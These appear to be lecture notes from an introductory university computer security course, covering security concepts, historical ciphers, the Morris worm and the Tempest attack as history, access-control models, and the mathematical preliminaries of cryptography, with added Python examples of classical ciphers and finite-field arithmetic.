Introduction to Computer Security, CS3235
Hugh Anderson
CS3235 - Hugh Anderson’s notes.
Contact information
Room S15 #06-12
Telephone 6874-6903
E-mail [email protected]
...and Spinellis...
CS3235 - Hugh Anderson’s notes. Page number: 1
People
Dr Robert Deng, Institute for Infocomm Research
http://www.i2r.a-star.edu.sg/icsd/staff/Robert/
Official SOC description
With the widespread use of computers and Internet as well as electronic commerce, computer security becomes more and more important. The objective of this module is to give students basic knowledge of computer security. This module covers the following topics: threats to computer systems, network security fundamentals, security in a layered protocol architecture, authentication in computer systems, access control, intrusion detection, security architecture and frameworks, lower layers security protocols, upper layer security protocols, electronic mail and EDI security, directory systems security, Unix systems security, security evaluation criteria.
Assessment
Assessment               Weighting
Assignments              35%
Tutorials                5%
Mid-term (closed book)   10%
Final exam (open book)   50%
Total marks              100%
Resources
Computer Security: Art and Science, Matt Bishop
The notes are expanded versions of the overheads
Directed readings - all available on the Internet.
IVLE at http://ivle.nus.edu.sg/
Web site at http://www.comp.nus.edu.sg/~cs3235
Comparison
Different focus
More introductory and practical material
Less material duplicated
Topics - general
History and background,
Preliminaries
Encoding and decoding
Protocols used for security.
Topics - detail
• Mathematical, physical, legal (2 lectures)
• Security models (1 lecture)
• Secrecy (1 lecture)
• Insecurity (2 lectures)
• Safety/control hardware/software (2 lectures)
• Assurance (1 lecture)
• Protocols (1 lecture)
• + Case studies
Tutorials
Start in 3rd week
More details next week
My expectation...
Attend classes and tutorials
Ask if you don’t know
Read notes, book, and the readings...
Get interested in the subject
Chapter 1
Lecture 1 - Introduction
Jump-about-introduction
...sorry sorry...
The History of Herodotus
For Histiæus, when he was anxious to give Aristagoras orders to revolt, could find but one safe way, as the roads were guarded, of making his wishes known; which was by taking the trustiest of his slaves, shaving all the hair from off his head, and then pricking letters upon the skin, and waiting till the hair grew again. Thus accordingly he did; and as soon as ever the hair was grown, he despatched the man to Miletus, giving him no other message than this- "When thou art come to Miletus, bid Aristagoras shave thy head, and look thereon." Now the marks on the head, as I have already mentioned, were a command to revolt...
The History of Herodotus
Histiæus ensured confidentiality
Used again by Germany in the 1914-1918 war
This is now called steganography
More history
Cæsar encoded messages - cryptography
Agreed protocols to ensure correct conduct of a war
Examples taken from the world of warfare
Aspects to “computer security”
Security problems in society reoccur in computers
Confidentiality = locks/encoding.
Integrity = handshakes/signatures
Computer versions much faster.
In this course, security includes wider aspects.
Terms: Services
Three aspects of security services:
• confidentiality : concealing information - resources;
• integrity : trustworthiness of data - resources;
• availability : preventing denial-of-service.
Terms: Threats
[Four diagrams: Alice and Bob communicate while Ted attacks the channel, illustrating snooping, man in the middle, denial of service, and spoofing.]
• disclosure : unauthorized access (snooping);
• deception : accept false data (man-in-the-middle);
• disruption : prevent correct operation (denial-of-service);
• usurpation : unauthorized control (spoofing).
Terms: Policy and mechanism
We differentiate between a security policy and a security mechanism:
• policy : what is allowed/disallowed;
• mechanism : ways of enforcing a policy.
NUS IT policy
For example, at NUS, we have an IT policy which includes a range of clauses regarding security concerns, such as:
4.2 Undermining System Integrity
Users must not undermine the security of the IT Resources, for example, by cracking passwords or to modify or attempt to modify the files of other Users or software components of the IT Resources.
NUS mechanisms
6.3 Use Of Security Scanning Systems
Users consent to the University's use of scanning programs for security purposes at system level for computers and systems that are connected to the University's network. This is to ensure that any computers or systems attached to the network will not become a launching pad for security attack and jeopardise the IT Resources. System level scanning includes scanning for security vulnerabilities and virus detection on email attachments. Users' files and data are excluded from the scanning.
Topic: Preliminaries
Review some mathematical concepts: XOR, modulo, primes.
The textbook and my notes should be enough.
Physical laws and procedures. Information and entropy.
Topic: Security models
These models provide formal ways of looking at computer security in an abstract manner.
1. Define a model, and
2. prove it secure, then
3. ensure the system complies with the model.
Topic: Security models
• The Bell-LaPadula model (no read-up, no write-down) provides a military viewpoint to assure confidentiality services.
• The Biba and Clark-Wilson models attempt to model the trustworthiness of data and programs, providing assurance for integrity services.
... Read ahead ...
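The two rules named above, "no read-up, no write-down" for Bell-LaPadula and their mirror image for Biba, are access decisions over a lattice of labels. The following is an added example written for these notes, not code from the lecture or from the textbook; the level names, the compartment sets and the subject/object labels are constructed for illustration.

```python
"""Bell-LaPadula and Biba access decisions over a security lattice (added example)."""
from dataclasses import dataclass, field

# Constructed hierarchy of levels; real systems add many compartments ("categories").
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top secret": 3}


@dataclass(frozen=True)
class Label:
    """Security label: a hierarchical level plus a set of compartments."""
    level: str
    categories: frozenset = field(default_factory=frozenset)

    def dominates(self, other: "Label") -> bool:
        """self >= other in the lattice: higher-or-equal level AND superset of compartments."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.categories <= self.categories)


# Bell-LaPadula (confidentiality): information may only flow upwards.
def blp_can_read(subject: Label, obj: Label) -> bool:
    """Simple security property: no read-up. The subject must dominate the object."""
    return subject.dominates(obj)


def blp_can_write(subject: Label, obj: Label) -> bool:
    """*-property: no write-down. The object must dominate the subject."""
    return obj.dominates(subject)


# Biba (integrity): the dual lattice, information may only flow downwards.
def biba_can_read(subject: Label, obj: Label) -> bool:
    """No read-down: a subject must not read less trustworthy data."""
    return obj.dominates(subject)


def biba_can_write(subject: Label, obj: Label) -> bool:
    """No write-up: a subject must not modify more trustworthy data."""
    return subject.dominates(obj)


def decide(model: str, subject: Label, obj: Label) -> dict:
    """Read/write decision for one subject/object pair under 'blp' or 'biba'."""
    read, write = {"blp": (blp_can_read, blp_can_write),
                   "biba": (biba_can_read, biba_can_write)}[model]
    return {"read": read(subject, obj), "write": write(subject, obj)}


if __name__ == "__main__":
    # Constructed labels: an analyst cleared to secret in the "nuclear" compartment.
    analyst = Label("secret", frozenset({"nuclear"}))
    report = Label("confidential", frozenset({"nuclear"}))
    plans = Label("top secret", frozenset({"nuclear"}))
    crypto = Label("secret", frozenset({"crypto"}))   # same level, incomparable compartment
    for name, obj in [("report", report), ("plans", plans), ("crypto", crypto)]:
        print(name, "BLP:", decide("blp", analyst, obj), "Biba:", decide("biba", analyst, obj))
```

Note that the two models are exact duals: every Bell-LaPadula "read" test is a Biba "write" test, which is why a system that wants both confidentiality and integrity needs two separate label sets, and why the "crypto" object (same level, different compartment) is neither readable nor writable under either model.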
Topic: Security models
Determine properties of the model, and
Verify that implementations are valid.
Basis of trusted operating systems
Modelling for availability is tricky
Topic: Secrecy
Commerce relies on secure transfer of information, and
Often just want things to be secret
Distance between you and an attacker is shrinking
Criminals have an access point into your living room
2000 years ago...
Replace each Roman letter in a message with another Roman letter, obtained by rotating the (23-letter Latin) alphabet some number of characters:
Plain:     I C L A V D I V S
Alphabet:  A B C D E F G H I K L M N O P Q R S T V X Y Z
Rotated:   V X Y Z A B C D E F G H I K L M N O P Q R S T
Cipher:    E Y G V Q Z E Q O
We can specify a Cæsar cipher by just noting the number of characters that the alphabet is rotated.
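The rotation above, generalised to any alphabet, and the reason it offers no secrecy: the key is one of 22 rotations, so an attacker simply tries them all, and a single known letter pair gives the key directly. This is an added example written for these notes, not code from the lecture; the 23-letter alphabet is the one in the table, and the key value 19 (four places backwards) is read off it.

```python
"""Shift (Caesar) cipher over an arbitrary alphabet, and why it is trivially broken (added example)."""

# The 23-letter classical Latin alphabet used in the notes' table (no J, U or W).
LATIN = "ABCDEFGHIKLMNOPQRSTVXYZ"


def shift_encrypt(plaintext: str, key: int, alphabet: str = LATIN) -> str:
    """Replace each letter by the one `key` places further along the alphabet, wrapping round."""
    n = len(alphabet)
    index = {ch: i for i, ch in enumerate(alphabet)}
    return "".join(alphabet[(index[ch] + key) % n] for ch in plaintext)


def shift_decrypt(ciphertext: str, key: int, alphabet: str = LATIN) -> str:
    """Decryption is encryption with the negated key (Python's % keeps the index non-negative)."""
    return shift_encrypt(ciphertext, -key, alphabet)


def brute_force(ciphertext: str, alphabet: str = LATIN) -> dict:
    """The key space has only len(alphabet) - 1 non-trivial keys: list every candidate plaintext."""
    return {k: shift_decrypt(ciphertext, k, alphabet) for k in range(1, len(alphabet))}


def key_from_one_pair(plain_ch: str, cipher_ch: str, alphabet: str = LATIN) -> int:
    """A single known plaintext/ciphertext letter pair pins down the key exactly."""
    return (alphabet.index(cipher_ch) - alphabet.index(plain_ch)) % len(alphabet)


if __name__ == "__main__":
    ct = shift_encrypt("ICLAVDIVS", 19)   # 19 forward == 4 backward, as in the table
    print(ct)                              # EYGVQZEQO
    for k, candidate in brute_force(ct).items():
        print(k, candidate)                # the real plaintext appears at k = 19
    print(key_from_one_pair("I", "E"))     # 19
```

The point for a practitioner is not the cipher but the key space: 22 possibilities is small enough to enumerate by hand, and any cipher whose key can be recovered from one known plaintext/ciphertext pair is broken regardless of how well the key is kept.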
60 years ago...
Enigma machines
Commercial device
Used by the German military
Belief that could not be decoded.
Hacking Enigma
Americans captured a German submarine?
Alan Turing did it all?
Hard workers at Bletchley Park?
My dad?
Hacking Enigma
1928: Poles intercepted a machine
1928: Maths Dept at University of Poznan: Marian Rejewski, Jerzy Rozycki, Henryk Zygalski.
Decoded some messages
German army using an extra level of encoding
French spies uncovered the extra encoding
Hacking Enigma
1933-1939: the Polish Cipher Bureau was able to decode messages, although slowly.
July 1939: Poland gave Enigma copies to the British and the French
Bletchley Park
May 1941: the British captured the U-110 submarine, complete with a genuine Enigma machine and code books.
Hacking Enigma
1941-45: the British could decode most German military transmissions.
1941-45: developed electromechanical hardware (the "bombes") to search for Enigma keys; the later Colossus machines, built against the German Lorenz teleprinter cipher, were
precursors to modern-day computers.
Today...sssshhhh
Secure shell (ssh) provides encrypted communications between
two untrusted hosts over an insecure network.
Other connections (X11 and arbitrary TCP ports) can also be forwarded over it.
Users must prove their identity to the remote machine.
Secure-shell
Based on public-key cryptography:
• encryption and decryption use separate keys, and it is believed infeasible to derive one from the other; RSA is one such system;
• the bulk data is protected by a conventional (symmetric) cipher under a session key that the public-key exchange establishes;
• encodings believed to be difficult to decode, and
• protocols of message exchange that are believed to be secure.
Topic: Insecurity
Systems dangerously easy to subvert
Adversary gains control over your system
You sign a contract, and other party doesn’t.
Investigate hacking and reducing risk
Topic: Insecurity
A locked air-conditioned room with a file server:
• The lock can be picked, or the door kicked in.
• The console of the server computer may be password protected, but
– it may be rebooted with a different disk.
Topic: Insecurity
• The reboot process may be (BIOS) password protected, but
– the case of the computer may be opened and the disk removed (encrypting the disk contents limits what the removed disk yields, but moves the problem to protecting the key).
• And so on...
Topic: Insecurity
Tempest - computer screen monitoring
Paper: http://jya.com/emr.pdf
Overcoming: http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf
Monitor screens at a distance of 1km for $15.
Topic: Insecurity
Kick in doors without even using your feet
Topic: Insecurity
Non-repudiation for e-commerce:
• the buyer cannot order an item and then deny the order took place;
• the seller cannot accept money or an order and then later deny that this took place.
Topic: Insecurity
Intrusive hacking is common on the Internet.
Farms of subservient machines:
At first, it looked as if some students at the Flint Hill School, a prep academy in Oakton, Va., had found a lucrative alternative to an after-school job...
Topic: Insecurity
Viruses: boot-sector viruses hide their code in the boot sector of a disk.
The Stoned virus for DOS, written by a student from New Zealand!
A virus contains code that replicates, attaching itself to a program, boot sector or document. Some viruses do damage as well.
Topic: Insecurity
A worm is a program that makes copies of itself, transferring itself around. The Morris worm in 1988:
On the evening of 2 November 1988, someone infected the Internet with a worm program. That program exploited flaws in utility programs in systems based on BSD-derived versions of UNIX. The flaws allowed the program to break into those machines and copy itself, thus infecting those systems.
The Morris Worm
This program eventually spread to thousands of machines, and disrupted normal activities and Internet connectivity for many days.
ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
The author of the worm, Robert Morris, was convicted and fined $10,050 in 1990, and is currently a professor in the Parallel and Distributed Operating Systems group at MIT, lecturing in distributed systems areas.
Topic: Protocols
Some aspects of security are determined by the way in which we do things (the protocol), rather than what is actually done.
Summary of topics
In this section, we introduced the following topics:
• An introduction to computer security
• Some definitions
Further study
• Textbook Chapter 1
• Monitoring computer screens: http://jya.com/emr.pdf
• Overcoming Tempest monitoring: http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf
• The Morris worm: ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
• Military mathematical modelling of security: http://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172
Done!
Chapter 2
Lecture 2 - Preliminaries
Note: CORS
You should be getting your tutorial sessions sorted out using CORS!
http://www.cors.nus.edu.sg/
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
Question box
If you have any questions, feel free to place them in the question box...
Or stick your hand up...
Or...
Last session
Introduction, setting context
Definitions
Cæsar cipher, Enigma, Secure shell
Insecurity
This session
• Finish context
• Math preliminaries
– XOR
– Logarithms
– Fields and groups
Diagram for BAG
Safety/control software
A naive approach to security might involve attempting to ensure that all programs that run on a computer are safe, and that all users of computer systems are trustworthy.
Checking even one program is a non-trivial task.
The computer operating system normally provides some level of software and hardware security for computer systems, combined with some level of user authentication and authorization.
Safety/control software
User authentication usually means passwords!
Systems have grown in complexity over the years.
An article shows the changes in the UNIX mechanism
Hardware security
Hardware security in operating systems has been studied in CS2106 (Operating Systems) and other courses. The Kernel/Supervisor bit, processor ring 0, memory protection/mapping hardware and so on are all examples of hardware security systems intended to co-operate with the OS to enhance system security.
Software security in operating systems takes many forms. The forms range from ad-hoc changes to operating systems to fix security loopholes as they are found, through to operating systems built from the ground up to be secure.
Example: network security
TCP wrappers:
• Attacks come through poorly controlled TCP or UDP ports.
• The wrapper (tcpd) provides a single point of control for the services it fronts (those started through inetd or linked with libwrap; it does not protect anything else).
• A sensible default installation disables all access (ALL: ALL in /etc/hosts.deny), and
• re-enables it on a case-by-case basis in /etc/hosts.allow.
OS security
NSA have a security-enhanced Linux system:
This version of Linux has a strong, flexible mandatory access control architecture incorporated into the major subsystems of the kernel. The system provides a mechanism to enforce the separation of information based on confidentiality and integrity requirements.
You can read about SELinux at
http://www.nsa.gov/selinux/index.html
OS security
Java virtual machine has built-in security model
Microsoft point out that the Linux security model isweak...
Every member of the Windows NT family since Windows NT 3.5 has been evaluated at either a C2 level under the U.S. Government's evaluation process or at a C2-equivalent level under the British Government's ITSEC process. In contrast, no Linux products are listed on the U.S. Government's evaluated product list.
Topic: Assurance
How can we convince ourselves (or our employer) that the computer system is to be trusted?
Building assurance is best done by adopting formal methods to confirm, specify and verify the behaviour of systems.
ITSEC and CC
UK, Germany, France and the Netherlands produced the Information Technology Security Evaluation Criteria (ITSEC).
The IT Security Evaluation Manual (ITSEM) specifies the methodology for evaluation.
The Common Criteria for Information Technology Security Evaluation harmonises ITSEC, CTCPEC (the Canadian criteria) and the US Federal Criteria.
Accepted by the ISO (ISO/IEC 15408).
ITSEC
In an article, elements of the first certification of a smart-card system under the European ITSEC level E6 are outlined.
This process involved verification of the specification with independent systems, and a formal process for the implementation, deriving it from the specification using the refinement process.
Math preliminaries
This chapter and the following chapter are copied verbatim from "The Laws of Cryptography with Java Code", with permission from Prof Neal Wagner. The book is well worth reading and contains a lot of information that is relevant to this course. You can find the book at
http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf
Exclusive-Or
Law XOR-1: The cryptographer's favorite function is Exclusive-Or.
Exclusive-Or comes up constantly in cryptography.
Same as addition mod 2
Exclusive-Or
Also written as xor, or as a plus sign in a circle, ⊕.
The expression a ⊕ b means either a or b but not both.
Ordinary inclusive-or in mathematics means either one or the other or both.
The exclusive-or function in C / C++ / Java for bit strings is written as a hat character: ^ .
Exclusive-Or for 1-bit
Exclusive-Or
 a  b  a ⊕ b
 0  0    0
 0  1    1
 1  0    1
 1  1    0
Exclusive-Or
Message             A                  B                  C
m                   0 1 0 0 0 0 0 1    0 1 0 0 0 0 1 0    0 1 0 0 0 0 1 1   . . .
Key = k             0 0 0 1 0 0 1 1    0 1 1 0 0 1 0 1    0 0 1 1 1 0 0 1   . . .
K(m) = m ⊕ k        0 1 0 1 0 0 1 0    0 0 1 0 0 1 1 1    0 1 1 1 1 0 1 0   . . .
K(m)                R                  '                  z
Exclusive-Or
K(m)                R                  '                  z
                    0 1 0 1 0 0 1 0    0 0 1 0 0 1 1 1    0 1 1 1 1 0 1 0   . . .
Key = k             0 0 0 1 0 0 1 1    0 1 1 0 0 1 0 1    0 0 1 1 1 0 0 1   . . .
m = K(m) ⊕ k        0 1 0 0 0 0 0 1    0 1 0 0 0 0 1 0    0 1 0 0 0 0 1 1   . . .
Message             A                  B                  C
If the key bit-stream k is truly random, at least as long as the message, unknown to the eavesdropper and never used again, then this is the most secure system possible: it is known as a one-time pad. Reusing the pad breaks it, since K(m1) ⊕ K(m2) = m1 ⊕ m2 reveals the relation between the two messages without the key.
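The encryption and decryption tables above, and the failure mode the last sentence warns about, as an added example written for these notes (not code from the lecture or from Wagner's book). The key bytes 0x13, 0x65, 0x39 are read off the table; the two sixteen-byte messages used to show pad reuse are constructed here.

```python
"""One-time pad with XOR, and the damage done by reusing the pad (added example)."""
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bitwise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("xor_bytes needs equal-length inputs")
    return bytes(x ^ y for x, y in zip(a, b))


def otp_encrypt(message: bytes, pad: bytes) -> bytes:
    """K(m) = m XOR k. The pad must be at least as long as the message."""
    if len(pad) < len(message):
        raise ValueError("pad shorter than message: this is no longer a one-time pad")
    return xor_bytes(message, pad[:len(message)])


# Decryption is the same operation: (m XOR k) XOR k = m.
otp_decrypt = otp_encrypt


def fresh_pad(length: int) -> bytes:
    """Pad bytes from the OS cryptographic RNG (never from random.random())."""
    return secrets.token_bytes(length)


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """Two ciphertexts under one pad: c1 XOR c2 = m1 XOR m2, the pad cancels out entirely."""
    return xor_bytes(c1, c2)


def recover_other_message(c1: bytes, c2: bytes, known_m1: bytes) -> bytes:
    """With one plaintext known (or guessed), the other falls out: (m1 XOR m2) XOR m1 = m2."""
    return xor_bytes(two_time_pad_leak(c1, c2), known_m1)


if __name__ == "__main__":
    # The notes' worked example: key bytes 0x13, 0x65, 0x39 turn "ABC" into "R'z".
    print(otp_encrypt(b"ABC", bytes([0x13, 0x65, 0x39])))
    # Pad reuse with two constructed messages: the eavesdropper never sees the pad.
    pad = fresh_pad(16)
    c1 = otp_encrypt(b"ATTACK AT DAWN!!", pad)
    c2 = otp_encrypt(b"RETREAT AT DUSK!", pad)
    print(recover_other_message(c1, c2, b"ATTACK AT DAWN!!"))
```

The pad has to come from a cryptographic random source, be as long as all the traffic it will ever protect, and be destroyed after use; every practical stream cipher is an attempt to get the XOR structure without those three costs, and every "two-time pad" bug in deployed systems is the recovery step above.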
Properties of XOR
a ⊕ a = 0
a ⊕ 0 = a
a ⊕ 1 = ∼a, where ∼ is bit complement.
a ⊕ b = b ⊕ a (commutativity)
a ⊕ (b ⊕ c) = (a ⊕ b) ⊕ c (associativity)
a ⊕ a ⊕ a = a
if a ⊕ b = c, then c ⊕ b = a and c ⊕ a = b.
Reminder
Exchange the values in two variables a and b
temp = a;
a = b;
b = temp;
Exchange using XOR
a = a ^ b;
b = a ^ b;
a = a ^ b;
a' = a ⊕ b
b' = (a ⊕ b) ⊕ b = a
a'' = (a ⊕ b) ⊕ a = b
(If a and b are the same variable, the first line sets it to a ⊕ a = 0 and the value is lost, so this trick is only safe when the two are known not to alias.)
Logarithms
Law LOG-1: The cryptographer's favorite logarithm is log base 2.
$y = \log_b x$ is the same as $b^y = x$
$b^{\log_b x} = x$
Logarithm is the inverse of exponential.
Logarithms
Use logs base 2 in cryptography.
$y = \log_2 x$ is the same as $2^y = x$
$2^{10} = 1024$ is the same as $\log_2 1024 = 10$.
$2^y > 0$ for all $y$, and
$\log_2 x$ is not defined for $x \le 0$.
Properties of logs
$\log_2(ab) = \log_2 a + \log_2 b$, for all $a, b > 0$
$\log_2(a/b) = \log_2 a - \log_2 b$, for all $a, b > 0$
$\log_2(1/a) = \log_2(a^{-1}) = -\log_2 a$, for all $a > 0$
$\log_2(a^r) = r \log_2 a$, for all $a > 0$ and all $r$
$\log_2(a + b) =$ (Oops! No simple formula for this.)
Examples
Logarithms base 2
x = 2^y = 2^(log_2 x)     y = log_2 x
1,073,741,824              30
1,048,576                  20
1,024                      10
8                           3
4                           2
2                           1
1                           0
Examples
Logarithms base 2
x = 2^y = 2^(log_2 x)     y = log_2 x
1                           0
1/2                        −1
1/4                        −2
1/8                        −3
1/1,024                   −10
0                         −∞ (the limit; log_2 0 itself is not defined)
< 0                       undefined
Natural logs
A log base 2 is just a fixed constant times a natural log:
$\log_2 x = \log_e x / \log_e 2$ (mathematics)
= Math.log(x)/Math.log(2.0); (Java)
The magic constant is:
$\log_e 2 = 0.69314\,71805\,59945\,30941\,72321$, or $1/\log_e 2 = 1.44269\,50408\,88963\,40735\,99246$.
Proof of formula
$2^y = x$, or $y = \log_2 x$ (then take $\log_e$ of each side)
$\log_e(2^y) = \log_e x$ (then use properties of logarithms)
$y \log_e 2 = \log_e x$ (then solve for $y$)
$y = \log_e x / \log_e 2$ (then substitute $\log_2 x$ for $y$)
$\log_2 x = \log_e x / \log_e 2$.
Bits to represent
Law LOG-2: The log base 2 of an integer x tells how many bits it takes
to represent x in binary.
More precisely, a positive integer x needs $\lfloor \log_2 x \rfloor + 1$ bits. Thus $\log_2 10000 = 13.28771238$, so it takes 14 bits to represent 10000 in binary. (In fact, $10000_{10} = 10011100010000_2$.) Exact powers of 2 are the case where simply rounding up fails: $\log_2 1024 = 10$, but it takes 11 bits to represent 1024 in binary, as $10000000000_2$.
Similarly, $\lfloor \log_{10} x \rfloor + 1$ gives the number of decimal digits needed to represent x.
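Law LOG-2 as code, with the caveat that matters when the integers are cryptographic keys: a double carries only 53 significant bits, so computing the bit count through a floating-point log2 over-counts for large values such as 2^64 - 1, while exact integer arithmetic does not. This is an added example written for these notes, not code from the lecture or from Wagner's book; the key-size check and its 2048-bit threshold are illustrative.

```python
"""How many bits does an integer need, and why not to compute it in floating point (added example)."""
import math


def bits_via_log(x: int) -> int:
    """Law LOG-2 taken literally: floor(log2 x) + 1, computed through a double."""
    if x <= 0:
        raise ValueError("log2 is only defined for positive integers")
    return math.floor(math.log2(x)) + 1


def bits_exact(x: int) -> int:
    """The same quantity in integer arithmetic: Python's int.bit_length()."""
    if x <= 0:
        raise ValueError("bit length is only meaningful for positive integers here")
    return x.bit_length()


def log2_float_is_wrong_for(x: int) -> bool:
    """True when the float route over-counts.

    Converting x to a double keeps 53 significant bits, so x = 2**64 - 1 rounds up to
    2**64 exactly, log2 of it is 64.0, and floor(64.0) + 1 = 65 although x has 64 bits.
    """
    return bits_via_log(x) != bits_exact(x)


def key_size_ok(modulus: int, required_bits: int = 2048) -> bool:
    """Check an RSA modulus really has the advertised size, using exact arithmetic only (illustrative)."""
    return bits_exact(modulus) >= required_bits


if __name__ == "__main__":
    for x in (10000, 1024, 2**64 - 1):
        print(x, bits_via_log(x), bits_exact(x))
```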
Groups
A group is
a set of group elements with a binary operation.
If one denotes the group operation by #, then the above says that for any group elements a and b, a # b is defined and is also a group element.
Groups
Groups
• are associative, meaning that a # (b # c) = (a # b) # c;
• have an identity element e satisfying a # e = e # a = a for any group element a;
• have an inverse a' for any element a, satisfying a # a' = a' # a = e.
Groups
If a # b = b # a for all group elements a and b, the group is commutative.
Otherwise it is non-commutative. Notice that even in a non-commutative group, a # b = b # a might sometimes be true, for example if a or b is the identity.
A group with only finitely many elements is called finite; otherwise it is infinite.
Examples
• The integers (all whole numbers, including 0 and negative numbers) form a group using addition. The identity is 0 and the inverse of a is −a.
– This is an infinite commutative group.
• The positive rationals (all positive fractions, including all positive integers) form a group if ordinary multiplication is the operation. The identity is 1 and the inverse of r is 1/r = r^(−1).
– This is another infinite commutative group.
Examples
• The integers mod n form a group for any integer n > 0. This group is often denoted Z_n. Here the elements are 0, 1, 2, . . ., n − 1 and the operation is addition followed by remainder on division by n. The identity is 0 and the inverse of a is n − a (except for 0 which is its own inverse).
– This is a finite commutative group.
Non-commutative Group
Consider 2-by-2 non-singular matrices of real numbers (or rationals), where the operation is matrix multiplication:
$\begin{pmatrix} a & b \\ c & d \end{pmatrix}$. Here $a, b, c$, and $d$ are real numbers (or rationals) and $ad - bc$ must be non-zero. The inverse is
$\frac{1}{ad - bc} \begin{pmatrix} d & -b \\ -c & a \end{pmatrix}$
and the identity is $\begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$. This is an infinite non-commutative group.
Groups
Law GROUP-1: The cryptographer's favorite group is the integers mod n, Z_n.
In the special case of n = 10, the operation of addition in Z_10 can be defined by (x + y) mod 10, that is, add, divide by 10 and take the remainder.
Integers modulo 10
 +  0 1 2 3 4 5 6 7 8 9
 0  0 1 2 3 4 5 6 7 8 9
 1  1 2 3 4 5 6 7 8 9 0
 2  2 3 4 5 6 7 8 9 0 1
 3  3 4 5 6 7 8 9 0 1 2
 4  4 5 6 7 8 9 0 1 2 3
 5  5 6 7 8 9 0 1 2 3 4
 6  6 7 8 9 0 1 2 3 4 5
 7  7 8 9 0 1 2 3 4 5 6
 8  8 9 0 1 2 3 4 5 6 7
 9  9 0 1 2 3 4 5 6 7 8
Fields
A field has two operations:
+, with the elements of the field forming a commutative group. The identity is 0 and the inverse of a is −a.
∗, with the elements of the field except 0 forming another commutative group, identity denoted by 1 and inverse of a denoted by a^(−1).
Fields
There is also the distributive identity, linking + and ∗ :
a ∗ (b + c) = (a ∗ b) + (a ∗ c)
Exclude divisors of zero, that is, non-zero elements whose product is zero.
Equivalent to the following cancellation property: if c is not zero and a ∗ c = b ∗ c, then a = b.
Examples
The rational numbers (fractions) Q, or the real numbers R, or the complex numbers C, using ordinary addition and multiplication (extended in the last case to the complex numbers).
These are all infinite fields.
Example: integers mod p
The integers mod p, denoted Z_p, where p is a prime number (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).
A group using +. Elements without 0 form a group under ∗. The identity is clearly 1, but the inverse of a non-zero element a is not obvious.
Integers mod p inverse
In Java, the inverse must be x satisfying (x ∗ a) % p == 1.
Find x using the extended Euclidean algorithm:
p is prime and a is non-zero, so the greatest common divisor of p and a is 1.
The extended Euclidean algorithm gives x and y satisfying x ∗ a + y ∗ p = 1, or x ∗ a = 1 − y ∗ p,
and x is the inverse of a.
Field
Law FIELD-1: The cryptographer's favorite field is the integers mod p, denoted Z_p, where p is a prime number.
The above field is the only one with p elements. In other words, the field is unique up to renaming its elements, meaning that one can always use a different set of symbols to represent the elements of the field, but it will still be essentially the same.
Another Field
Law FIELD-2: The cryptographer's other favorite field is GF(2^n).
A finite field with p^n elements exists for any integer n > 1, denoted GF(p^n).
Useful in cryptography with p = 2, that is, with 2^n elements for n > 1.
The case 2^8 = 256 is used, for example, in the new U.S. Advanced Encryption Standard (AES).
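GF(2^8) made concrete: a byte is a polynomial over GF(2), addition is XOR, and multiplication is polynomial multiplication reduced modulo an irreducible degree-8 polynomial. This is an added example written for these notes, not code from the lecture or from Wagner's book. It uses the AES reduction polynomial x^8 + x^4 + x^3 + x + 1 (0x11B from FIPS-197), and the check values {57}·{83} = {c1} and {53}^(-1) = {ca} are the worked examples FIPS-197 gives for that field.

```python
"""Arithmetic in GF(2^8) as used by AES: bytes as polynomials over GF(2) (added example)."""

# AES reduction polynomial x^8 + x^4 + x^3 + x + 1, as the bit pattern 1 0001 1011.
AES_POLY = 0x11B


def gf_add(a: int, b: int) -> int:
    """Addition in GF(2^n) is XOR: coefficients are added mod 2, with no carries."""
    return a ^ b


def gf_mul(a: int, b: int, poly: int = AES_POLY) -> int:
    """Multiply two field elements, reducing modulo the irreducible polynomial.

    Shift-and-add, one bit of b at a time: doubling a is a left shift, and whenever the
    shifted value overflows bit 7 the modulus is subtracted (XORed) to keep it 8 bits wide.
    """
    result = 0
    for _ in range(8):
        if b & 1:
            result ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= poly & 0xFF
        b >>= 1
    return result


def gf_pow(a: int, e: int, poly: int = AES_POLY) -> int:
    """Square-and-multiply exponentiation in the field."""
    result = 1
    while e:
        if e & 1:
            result = gf_mul(result, a, poly)
        a = gf_mul(a, a, poly)
        e >>= 1
    return result


def gf_inverse(a: int, poly: int = AES_POLY) -> int:
    """Multiplicative inverse: the 255 non-zero elements form a group, so a^255 = 1 and a^-1 = a^254."""
    if a == 0:
        raise ZeroDivisionError("0 has no inverse in a field")
    return gf_pow(a, 254, poly)


def has_no_zero_divisors(poly: int) -> bool:
    """Field sanity check from the notes: with a reducible modulus some non-zero pair multiplies to 0."""
    return all(gf_mul(a, b, poly) != 0 for a in range(1, 256) for b in range(1, 256))


if __name__ == "__main__":
    print(hex(gf_mul(0x57, 0x83)), hex(gf_inverse(0x53)))        # 0xc1 0xca
    print(has_no_zero_divisors(AES_POLY), has_no_zero_divisors(0x100))  # True False
```

The last function is the "exclude divisors of zero" condition from the field definition turned into a test: with the reducible modulus x^8 (0x100) the product {80}·{02} is 0, so that choice does not give a field, whereas 0x11B passes for every pair.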
Fermat’s Theorem
Law FERMAT-1: The cryptographer's favorite theorem is Fermat's Theorem.
In cryptography, one often wants to raise a number to a power, modulo another number.
For the integers mod p where p is a prime (denoted Z_p), there is a result known as Fermat's Theorem, discovered by the 17th century French mathematician Pierre de Fermat, 1601-1665.
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
$a^{p-1} \bmod p = 1$
Fermat’s theorem
 p   a   a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9  a^10  a^11  a^12
13   2    2    4    8    3    6   12   11    9    5   10     7     1
